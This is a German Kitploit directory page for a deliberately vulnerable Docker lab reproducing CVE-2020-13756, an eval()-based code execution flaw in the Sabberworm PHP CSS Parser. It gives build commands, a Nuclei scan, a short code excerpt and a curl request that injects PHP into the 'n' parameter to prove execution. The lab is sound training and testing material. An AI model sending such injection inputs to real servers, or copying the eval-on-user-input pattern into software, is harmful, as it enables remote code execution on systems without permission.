Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-13756-env — Verwundbare Testumgebung für CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Tools/GitHubGitHub/kre80r/cve-2020-13756-env
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Verwundbare Testumgebung für CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Repository anzeigen
5vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-13756 Verwundbare Umgebung

Verwundbare Testumgebung für CVE-2020-13756 - Sabberworm PHP CSS Parser Remote Code Execution.

Details zur Schwachstelle

FeldWert
CVECVE-2020-13756
ProduktSabberworm PHP CSS Parser
Betroffene Versionen< 8.3.1
SchweregradKritisch (CVSS 9.8)
TypRemote Code Execution

Schnellstart (Einzeiler)

docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

Oder klonen und ausführen:

git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Manuelle Einrichtung

# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Schwachstelle verifizieren

# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

Die erwartete Ausgabe enthält VULN_TEST am Anfang, was die Codeausführung beweist.

Test mit Nuclei

nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Technische Details

Die Schwachstelle besteht in der Funktion getSelectorsBySpecificity(), die unsaubere Benutzereingaben an eval() übergibt:

// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

Referenzen

  • NVD
  • Fix Commit
  • Full Disclosure
  • PacketStorm

Haftungsausschluss

Diese Umgebung ist ausschließlich für autorisierte Sicherheitstests gedacht. Verwenden Sie sie nicht gegen Systeme ohne Erlaubnis.

Autor

KrE80r - Sicherheitsforschung

Tool herunterladen